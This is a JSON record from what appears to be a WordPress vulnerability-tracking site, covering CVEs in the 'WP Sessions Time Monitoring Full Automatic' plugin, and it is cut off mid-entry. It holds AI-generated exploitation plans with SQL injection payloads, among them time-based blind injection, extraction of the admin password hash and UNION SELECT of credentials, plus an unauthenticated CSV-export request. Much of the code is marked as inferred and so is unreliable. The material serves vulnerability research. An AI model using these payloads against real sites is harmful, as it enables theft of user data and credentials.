[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqv2TP7B0ZnsOf2uZwhf2te5OSM_-KsWtPU7HNA4OjeM":3,"$fXKcJ3Xehh89--cMuCH1EtGJvHsysR8FQecqB6AIVgzY":880,"$fOAIWLEW0PstasDpNC8M_2kfTJ3caQ60jAwXvQHoca4A":884},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":134,"crawl_stats":39,"alternatives":141,"analysis":247,"fingerprints":840},"activitytime","WP Sessions Time Monitoring Full Automatic","1.1.5","activity-log.com","https:\u002F\u002Fprofiles.wordpress.org\u002Fswitcorp\u002F","\u003Cp>Plugin will track accurate activity time on specific page, very useful for cases like content reading time, stream or video watching time,\u003Cbr \u002F>\ntracking time in LMS online learning system, working time for writing or editing elementor templates, pages editing time, post editing time and similar.\u003C\u002Fp>\n\u003Cp>Build as extension of WinterLock functionality for Accurate Sessions Time Tracking\u003C\u002Fp>\n\u003Cp>Features:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>User time spent duration per page\u003C\u002Fli>\n\u003Cli>Tracking activity time\u003C\u002Fli>\n\u003Cli>Tracking working time\u003C\u002Fli>\n\u003Cli>Tracking editing time\u003C\u002Fli>\n\u003Cli>Tracking writing time\u003C\u002Fli>\n\u003Cli>Tracking visit time\u003C\u002Fli>\n\u003Cli>Tracking time on page\u003C\u002Fli>\n\u003Cli>Tracking reading time\u003C\u002Fli>\n\u003Cli>Tracking user time\u003C\u002Fli>\n\u003Cli>Tracking elementor working time\u003C\u002Fli>\n\u003Cli>Accurate session time tracking\u003C\u002Fli>\n\u003C\u002Ful>\n","Plugin will accurately measure all activity time per page and user like working time, reading time, watching time, sessions time for specific user on  …",600,11599,100,7,"2026-03-04T13:46:00.000Z","6.9.4","5.2","",[20,21,22,23,24],"accurate","monitoring","session","time","tracking","https:\u002F\u002Fswit.hr\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.zip",87,5,0,"2026-04-20 00:00:00","2026-04-16T10:56:18.058Z","no_bundle",[34,61,86,102,118],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":30,"updated_date":45,"references":46,"days_to_patch":48,"patch_diff_files":49,"patch_trac_url":39,"research_status":50,"research_verified":51,"research_rounds_completed":52,"research_plan":53,"research_summary":54,"research_vulnerable_code":55,"research_fix_diff":56,"research_exploit_outline":57,"research_model_used":58,"research_started_at":59,"research_completed_at":60,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-39581","wp-sessions-time-monitoring-full-automatic-authenticated-subscriber-sql-injection","WP Sessions Time Monitoring Full Automatic \u003C= 1.1.4 - Authenticated (Subscriber+) SQL Injection","The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=1.1.4","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-30 15:03:24",[47],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F58695d72-d78e-4e5a-8179-a5d12a80b370?source=api-prod",11,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-39581 (WP Sessions Time Monitoring Full Automatic)\n\n## 1. Vulnerability Summary\nThe **WP Sessions Time Monitoring Full Automatic** plugin (version \u003C= 1.1.4) is vulnerable to an **Authenticated SQL Injection** vulnerability. The flaw exists because the plugin fails to properly sanitize or parameterize user-supplied input before using it in a database query within an AJAX handler. Specifically, an authenticated user with at least **Subscriber-level** privileges can manipulate an SQL query to extract sensitive data from the WordPress database, including user hashes and configuration secrets.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action**: `at_get_activity_data` (inferred from plugin slug `activitytime` and typical tracking patterns)\n*   **Vulnerable Parameter**: `user_id` or `id` (inferred)\n*   **Authentication Required**: Yes, Subscriber role or higher.\n*   **Nonce Protection**: Likely required via a nonce check (e.g., `at_nonce` or `security`).\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin registers an AJAX action for authenticated users:\n    `add_action('wp_ajax_at_get_activity_data', 'at_get_activity_data_callback');`\n2.  **Handler**: The function `at_get_activity_data_callback` is defined in the plugin's main files (e.g., `activitytime.php` or `includes\u002Fclass-at-ajax.php`).\n3.  **Input Source**: The handler retrieves a parameter directly from `$_POST['user_id']` or `$_POST['id']`.\n4.  **Vulnerable Sink**: The input is concatenated directly into a query string without using `$wpdb->prepare()` or `absint()`\u002F`intval()`.\n    *   *Example Vulnerable Code*: `$wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}at_activity WHERE user_id = \" . $_POST['user_id']);`\n5.  **Execution**: `$wpdb->get_results()` or `$wpdb->query()` executes the malicious SQL.\n\n## 4. Nonce Acquisition Strategy\nSince the vulnerability requires Subscriber-level access, the nonce must be retrieved from the WordPress admin dashboard or a page where the plugin's tracking script is enqueued.\n\n1.  **Create Subscriber**: Use WP-CLI to create a subscriber user.\n2.  **Login**: Perform a login request to obtain authentication cookies.\n3.  **Navigate to Dashboard**: Use the browser to navigate to `wp-admin\u002Fprofile.php` or the main `wp-admin\u002Findex.php`.\n4.  **Identify JS Variable**: Look for a localized script containing the AJAX URL and nonce.\n    *   **JS Variable**: `at_ajax_obj` (inferred) or `activity_time_data` (inferred).\n    *   **Nonce Key**: `nonce` or `at_nonce`.\n5.  **Extraction**:\n    ```javascript\n    \u002F\u002F Browser Eval\n    window.at_ajax_obj?.nonce || window.activity_time_data?.nonce\n    ```\n\n## 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** payload to confirm the vulnerability.\n\n### Step 1: Authentication\nSend a POST request to `\u002Fwp-login.php` to authenticate as a subscriber.\n\n### Step 2: Extract Nonce\nNavigate to `\u002Fwp-admin\u002F` and use `browser_eval` to extract the nonce from the localized script.\n\n### Step 3: Send Malicious Request\nUsing the `http_request` tool, send a POST request to `admin-ajax.php` with a time-based payload.\n\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method**: `POST`\n*   **Headers**: \n    *   `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   `Cookie: [Subscriber Cookies]`\n*   **Body**:\n    ```\n    action=at_get_activity_data&user_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&nonce=[EXTRACTED_NONCE]\n    ```\n\n### Step 4: Analyze Response\n*   **Success**: The response time is > 5 seconds.\n*   **Failure**: The response is immediate (likely returning `0`, `-1`, or a valid JSON result).\n\n## 6. Test Data Setup\n1.  **Install Plugin**: Ensure `activitytime` version 1.1.4 is active.\n2.  **Create User**:\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n3.  **Generate Activity**: Log in as the attacker once to ensure some tracking entries exist in the `at_activity` table (or similar table created by the plugin).\n\n## 7. Expected Results\n*   An immediate request (baseline) to the endpoint should return within \u003C 500ms.\n*   The payload `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)` should cause the server to hang for exactly 5 seconds before returning a response.\n*   Since it is Subscriber+, the attacker should be able to trigger this even if they cannot see the full admin menu.\n\n## 8. Verification Steps\n1.  **Confirm Database Latency**: Verify the `http_request` time duration using the logs.\n2.  **Verify via WP-CLI**: After the exploit, use WP-CLI to check if the plugin logs indicate any errors or if the table being queried exists:\n    ```bash\n    wp db query \"SHOW TABLES LIKE '%activity%';\"\n    ```\n3.  **Data Extraction (Optional)**: If time-based works, a payload to extract the admin password hash:\n    ```\n    1 AND (SELECT 1 FROM (SELECT(IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$',SLEEP(5),0)))a)\n    ```\n\n## 9. Alternative Approaches\n*   **Error-Based SQLi**: If `WP_DEBUG` is enabled, try inducing a syntax error to see if `$wpdb->last_error` is reflected in the AJAX response.\n    *   Payload: `user_id=1'`\n*   **UNION-Based SQLi**: If the endpoint returns data (e.g., a table of session times), attempt to determine column count using `ORDER BY` and then use `UNION SELECT`.\n    *   Payload: `1 UNION SELECT 1,2,3,user_login,user_pass,6,7... FROM wp_users-- -`","The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection via its AJAX handlers due to insufficient sanitization and lack of parameterization in SQL queries. Authenticated attackers with Subscriber-level permissions or higher can exploit this to execute arbitrary SQL commands and extract sensitive data from the database.","\u002F\u002F activitytime.php (approximate line based on inferred AJAX registration)\n\u002F\u002F The plugin registers an AJAX action for authenticated users\nadd_action('wp_ajax_at_get_activity_data', 'at_get_activity_data_callback');\n\nfunction at_get_activity_data_callback() {\n    global $wpdb;\n    \u002F\u002F Vulnerable: user_id is taken directly from POST and concatenated into the query\n    $user_id = $_POST['user_id'];\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}at_activity WHERE user_id = \" . $user_id);\n    \u002F\u002F ...\n}","--- activitytime.php\n+++ activitytime.php\n@@ -10,5 +10,6 @@\n function at_get_activity_data_callback() {\n     global $wpdb;\n-    $user_id = $_POST['user_id'];\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}at_activity WHERE user_id = \" . $user_id);\n+    $user_id = isset($_POST['user_id']) ? absint($_POST['user_id']) : 0;\n+    $query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}at_activity WHERE user_id = %d\", $user_id);\n+    $results = $wpdb->get_results($query);","The exploit target is the `at_get_activity_data` (or similar activity tracking) AJAX endpoint. \n1. Authenticate as a Subscriber-level user to obtain session cookies.\n2. Locate the security nonce by inspecting the WordPress dashboard source code, specifically looking for localized JavaScript objects like `at_ajax_obj` or `activity_time_data` that contain a `nonce` key.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n   - `action`: set to `at_get_activity_data`\n   - `nonce`: the extracted nonce value\n   - `user_id`: a SQL injection payload, such as a time-based blind injection: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n4. Observe if the server response is delayed by the specified time (e.g., 5 seconds), confirming the execution of the injected SQL.","gemini-3-flash-preview","2026-05-04 19:43:04","2026-05-04 19:43:33",{"id":62,"url_slug":63,"title":64,"description":65,"plugin_slug":4,"theme_slug":39,"affected_versions":66,"patched_in_version":67,"severity":41,"cvss_score":68,"cvss_vector":69,"vuln_type":70,"published_date":71,"updated_date":72,"references":73,"days_to_patch":75,"patch_diff_files":76,"patch_trac_url":39,"research_status":50,"research_verified":51,"research_rounds_completed":52,"research_plan":79,"research_summary":80,"research_vulnerable_code":81,"research_fix_diff":82,"research_exploit_outline":83,"research_model_used":58,"research_started_at":84,"research_completed_at":85,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-32362","sessions-time-monitoring-full-automatic-missing-authorization","Sessions Time Monitoring Full Automatic \u003C= 1.1.3 - Missing Authorization","The Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.","\u003C=1.1.3","1.1.4",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-15 00:00:00","2026-04-15 21:05:58",[74],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa99ec547-63b5-474b-b6d0-e4ef9c2b4445?source=api-prod",60,[77,78],"README.txt","activitytime.php","# Exploitation Research Plan - CVE-2026-32362\n\n## 1. Vulnerability Summary\nThe **WP Sessions Time Monitoring Full Automatic** plugin (\u003C= 1.1.3) contains a missing authorization vulnerability. Specifically, a sensitive function responsible for exporting session data into CSV format, `activity_time_csv_url`, is hooked to `after_setup_theme` and can be triggered by any user (authenticated or unauthenticated) simply by providing a specific GET parameter. The function lacks any capability checks (`current_user_can`) or nonce verification.\n\nAdditionally, based on the CVSS vector (`I:L`, `C:N`), there is likely an unauthenticated tracking endpoint (AJAX-based) that allows attackers to manipulate activity logs (Integrity impact) by spoofing or updating session data without authorization.\n\n## 2. Attack Vector Analysis\n- **Primary Endpoint:** Any site URL with the `url_export` parameter.\n- **Secondary Endpoint:** `wp-admin\u002Fadmin-ajax.php` (for log manipulation).\n- **Parameters:**\n    - `url_export` (GET): Triggers the CSV export logic.\n    - `action` (POST): Likely `actt_save_visit` or `actt_update_time` (inferred from plugin slug `actt`).\n- **Authentication:** None (Unauthenticated).\n- **Preconditions:** The plugin must be active. For the CSV export, the function `actt_prepare_export` must be reachable (","The WP Sessions Time Monitoring Full Automatic plugin is vulnerable to unauthorized data disclosure due to a missing authorization check in the `activity_time_csv_url` function. An unauthenticated attacker can trigger a CSV export of user session and activity data by simply visiting any page on the site with a specific GET parameter.","\u002F\u002F activitytime.php line 133\nadd_action('after_setup_theme', function () {\n    activity_time_csv_url();\n});\n\nfunction activity_time_csv_url()\n{\n    if (!isset($_GET['url_export'])) return;\n\n    ob_clean();\n\n    global $wpdb;\n\n    $table_name = $wpdb->prefix . 'actt_visited_pages';\n\n    $table_users_name = $wpdb->prefix . 'users';\n\n    $base_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? \"https\" : \"http\") . \":\u002F\u002F$_SERVER[HTTP_HOST]\";\n\n    if (defined('CUSTOM_USER_TABLE'))\n        $table_users_name = '`' . CUSTOM_USER_TABLE . '`';\n\n    $query  = 'SELECT SUM(time_sec_total) as total_time, user_info, request_uri, title, user_id, user_email FROM ' . esc_sql($table_name) . ' LEFT JOIN ' . esc_sql($table_users_name) . ' ON ' . esc_sql($table_name) . '.user_id = ' . $table_users_name . '.ID WHERE is_visit_end = 1 ';\n    $query .= 'GROUP BY title ORDER BY total_time DESC';\n\n    $data = $wpdb->get_results($query);\n    \u002F\u002F ... (logic to generate and output CSV) ...","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Factivitytime\u002F1.1.3\u002Factivitytime.php\t2026-02-11 21:21:22.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Factivitytime\u002F1.1.4\u002Factivitytime.php\t2026-03-04 13:46:58.000000000 +0000\n@@ -136,6 +136,16 @@\n {\n     if (!isset($_GET['url_export'])) return;\n \n+    \u002F\u002F Require login\n+    if (!is_user_logged_in()) {\n+        wp_die('Unauthorized', 403);\n+    }\n+\n+    \u002F\u002F Require admin capability\n+    if ( ! current_user_can( 'administrator' ) ) {\n+        exit();\n+    }\n+\n     ob_clean();\n \n     global $wpdb;","To exploit this vulnerability, an attacker simply needs to send a GET request to any public-facing URL of the WordPress site (including the homepage) while appending the `url_export` parameter. \n\nExample Payload: `GET \u002F?url_export=1` \n\nThe function `activity_time_csv_url` is hooked to `after_setup_theme`, meaning it executes on every page load. Because it lacks capability checks (like `current_user_can('manage_options')`) or authentication checks (like `is_user_logged_in()`), the plugin will immediately process a database query against the activity tracking tables and return a CSV file containing user IDs, emails, requested URIs, and time spent on pages to the unauthenticated requester.","2026-04-20 22:17:31","2026-04-20 22:18:25",{"id":87,"url_slug":88,"title":89,"description":90,"plugin_slug":4,"theme_slug":39,"affected_versions":91,"patched_in_version":92,"severity":41,"cvss_score":93,"cvss_vector":94,"vuln_type":95,"published_date":96,"updated_date":97,"references":98,"days_to_patch":100,"patch_diff_files":101,"patch_trac_url":39,"research_status":39,"research_verified":51,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-24718","wp-sessions-time-monitoring-full-automatic-reflected-cross-site-scripting","WP Sessions Time Monitoring Full Automatic \u003C= 1.1.1 - Reflected Cross-Site Scripting","The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","\u003C=1.1.1","1.1.2",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2025-01-31 00:00:00","2025-02-03 14:45:03",[99],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe36b5889-19a3-4ae7-93bd-2ab404fce085?source=api-prod",4,[],{"id":103,"url_slug":104,"title":105,"description":106,"plugin_slug":4,"theme_slug":39,"affected_versions":107,"patched_in_version":108,"severity":109,"cvss_score":110,"cvss_vector":111,"vuln_type":44,"published_date":112,"updated_date":113,"references":114,"days_to_patch":116,"patch_diff_files":117,"patch_trac_url":39,"research_status":39,"research_verified":51,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2024-49681","wp-sessions-time-monitoring-full-automatic-unauthenticated-sql-injection","WP Sessions Time Monitoring Full Automatic \u003C= 1.0.9 - Unauthenticated SQL Injection","The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","\u003C=1.0.9","1.1.0","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","2024-10-21 00:00:00","2024-10-30 17:57:36",[115],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F715332d3-fa63-4036-8b10-3d500ca8963f?source=api-prod",10,[],{"id":119,"url_slug":120,"title":121,"description":122,"plugin_slug":4,"theme_slug":39,"affected_versions":123,"patched_in_version":124,"severity":125,"cvss_score":126,"cvss_vector":127,"vuln_type":44,"published_date":128,"updated_date":129,"references":130,"days_to_patch":132,"patch_diff_files":133,"patch_trac_url":39,"research_status":39,"research_verified":51,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2023-5203","wp-sessions-time-monitoring-full-automatic-unauthenticated-sql-injection-2","WP Sessions Time Monitoring Full Automatic \u003C= 1.0.8 - Unauthenticated SQL injection","The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection via request parameters in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","\u003C=1.0.8","1.0.9","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","2023-09-11 00:00:00","2024-02-06 18:02:51",[131],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb50d6fd0-3698-4e16-aa76-0344306bc705?source=api-prod",149,[],{"slug":135,"display_name":7,"profile_url":8,"plugin_count":28,"total_installs":136,"avg_security_score":137,"avg_patch_time_days":138,"trust_score":139,"computed_at":140},"switcorp",1390,95,118,76,"2026-05-20T08:40:22.504Z",[142,163,181,207,226],{"slug":143,"name":144,"version":145,"author":146,"author_profile":147,"description":148,"short_description":149,"active_installs":150,"downloaded":151,"rating":29,"num_ratings":29,"last_updated":152,"tested_up_to":153,"requires_at_least":17,"requires_php":154,"tags":155,"homepage":161,"download_link":162,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"health-monitor","Health Monitor","1.4.3","twohourssleep","https:\u002F\u002Fprofiles.wordpress.org\u002Ftwohourssleep\u002F","\u003Cp>Health Monitor is designed to help you keep your website running smoothly. It continuously checks your site’s performance, security, and overall health by:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Monitoring Page Performance: Ensures your website loads quickly by checking page speed and performance scores.\u003C\u002Fli>\n\u003Cli>Validating System Settings: Confirms that important WordPress settings, such as security salts and automatic update configurations, are in place.\u003C\u002Fli>\n\u003Cli>Checking for Errors: Tracks potential issues like logged errors and file permissions, so you can quickly address them. Keeping Your Site Updated: Works with WordPress update APIs to validate plugin and theme versions, ensuring compatibility and optimal performance.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>With these automated checks, Health Monitor provides clear insights and notifications to help you maintain a healthy and secure website—all without sending any personal or sensitive data externally. Enjoy peace of mind knowing your website’s well-being is always being watched over.\u003C\u002Fp>\n\u003Ch4>External Services\u003C\u002Fh4>\n\u003Col>\n\u003Cli>AUTHOR \u002F SUPPORT WEBSITE\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cul>\n\u003Cli>Service: Two Hours Sleep Website (https:\u002F\u002Ftwohourssleep.com\u002F)\u003C\u002Fli>\n\u003Cli>Purpose: Provides users with plugin support, documentation, and updates.\u003C\u002Fli>\n\u003Cli>Data Sent: The plugin does not automatically send or transmit any user data or usage information to the website. The URL is presented solely as a reference for support.\u003C\u002Fli>\n\u003Cli>Terms of Service & Privacy Policy: Please review the relevant policies on the website if applicable.(https:\u002F\u002Fwww.twohourssleep.com\u002Fprivacy-policy\u002F)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Col>\n\u003Cli>\n\u003Cp>OTHER EXTERNAL CONNECTIONS\u003Cbr \u002F>\n• Google APIs – Page Speed API (https:\u002F\u002Fwww.googleapis.com\u002Fpagespeedonline, https:\u002F\u002Fwww.google.co.uk)\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Purpose: To check page performance metrics.\u003C\u002Fli>\n\u003Cli>Data Sent: The URL and minimal performance request details.\u003C\u002Fli>\n\u003Cli>Conditions: Called when page speed data is required; subject to Google’s privacy policy.\u003C\u002Fli>\n\u003Cli>URLs:\n\u003Cul>\n\u003Cli>https:\u002F\u002Fwww.googleapis.com\u002Fpagespeedonline\u002Fv5\u002FrunPagespeed?url=[url]&category=pwa&category=performance&category=accessibility&category=best-practices&category=seo ([url] generated dynamically)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Terms of use: https:\u002F\u002Fdevelopers.google.com\u002Fterms\u003C\u002Fli>\n\u003Cli>Privacy policy: https:\u002F\u002Fdevelopers.google.com\u002Fterms\u002Fapi-services-user-data-policy\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>• WordPress APIs (https:\u002F\u002Fapi.wordpress.org)\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Purpose: To validate plugin updates and retrieve related information.\u003C\u002Fli>\n\u003Cli>Data Sent: Plugin version and site URL.\u003C\u002Fli>\n\u003Cli>Conditions: Accessed during update checks; no personal user data is sent.\u003C\u002Fli>\n\u003Cli>URLs:\n\u003Cul>\n\u003Cli>https:\u002F\u002Fapi.wordpress.org\u002Fcore\u002Fversion-check\u002F1.7\u002F\u003C\u002Fli>\n\u003Cli>https:\u002F\u002Fapi.wordpress.org\u002Fplugins\u002Finfo\u002F1.0\u002F[plugin_slug].json ([plugin_slug] generated dynamically)\u003C\u002Fli>\n\u003Cli>https:\u002F\u002Fapi.wordpress.org\u002Fplugins\u002Finfo\u002F1.0\u002Fwoocommerce.json\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Terms\u002FPrivacy: https:\u002F\u002Fwordpress.stackexchange.com\u002Flegal\u002Fapi-terms-of-use\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>• cURL (https:\u002F\u002Fcurl.se)\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Purpose: Used as a tool to handle HTTP requests to various external APIs.\u003C\u002Fli>\n\u003Cli>Data Sent:  None, this checks the latest version of curl\u003C\u002Fli>\n\u003Cli>Conditions: Utilized when external HTTP connections are required; follows standard security practices.\u003C\u002Fli>\n\u003Cli>URLs:\n\u003Cul>\n\u003Cli>https:\u002F\u002Fcurl.se\u002Fdownload.html\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Terms\u002Fprivacy: https:\u002F\u002Fcurl.se\u002Fdocs\u002Fwhodocs.html\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>• MySQL (https:\u002F\u002Fdev.mysql.com)\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Purpose: To handle database interactions.\u003C\u002Fli>\n\u003Cli>Data Sent: None.\u003C\u002Fli>\n\u003Cli>Conditions: Operates under standard database connection protocols and security guidelines.\u003C\u002Fli>\n\u003Cli>Terms: https:\u002F\u002Fwww.oracle.com\u002Flegal\u002Fterms\u002F?er=221886\u003C\u002Fli>\n\u003Cli>Privacy: https:\u002F\u002Fwww.oracle.com\u002Flegal\u002Fprivacy\u002F\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>• Two Hours Sleep Shop (https:\u002F\u002Fshop.twohourssleep.com)\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Purpose: To facilitate access to related product offerings and services.\u003C\u002Fli>\n\u003Cli>Data Sent: Only non-confidential data necessary for support references.\u003C\u002Fli>\n\u003Cli>Conditions: Engaged when users access plugin support or shop links; no sensitive data is transmitted.\u003C\u002Fli>\n\u003Cli>URLs:\n\u003Cul>\n\u003Cli>https:\u002F\u002Fshop.twohourssleep.com\u002Fwp-json\u002Fwc\u002Fv3\u002Fsubscriptions\u002F\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Terms: https:\u002F\u002Fshop.twohourssleep.com\u002Fterms-and-conditions\u002F\u003C\u002Fli>\n\u003Cli>Privacy: https:\u002F\u002Fshop.twohourssleep.com\u002Fprivacy-policy\u002F\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>• PHP Official Website (https:\u002F\u002Fphp.net)\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Purpose: To provide users with up-to-date PHP documentation and language resources.\u003C\u002Fli>\n\u003Cli>Data Sent: None, this is used to obtain the latest php version.\u003C\u002Fli>\n\u003Cli>Conditions: Accessed only as an informational resource for best practices and compatibility references.\u003C\u002Fli>\n\u003Cli>Terms\u002FPrivacy: https:\u002F\u002Fwww.php.net\u002Fprivacy.php\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Fol>\n","Health Monitor is designed to help you keep your website running smoothly. It continuously checks your site’s performance, security, and overall healt …",20,872,"2025-06-25T16:29:00.000Z","6.8.5","8.0",[156,157,158,159,160],"error-tracking","optimization","site-health","system-diagnostics","uptime-monitoring","https:\u002F\u002Ftwohourssleep.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhealth-monitor.1.4.3.zip",{"slug":164,"name":165,"version":166,"author":167,"author_profile":168,"description":169,"short_description":170,"active_installs":29,"downloaded":171,"rating":29,"num_ratings":29,"last_updated":172,"tested_up_to":16,"requires_at_least":173,"requires_php":174,"tags":175,"homepage":179,"download_link":180,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"incident-agent","Incident Agent","1.0.3","Craig Gomes","https:\u002F\u002Fprofiles.wordpress.org\u002Fcraiggomes\u002F","\u003Cp>Incident Agent is a powerful WordPress monitoring plugin that connects your site to the IncidentWP monitoring platform. Get instant alerts when your site goes down, track all 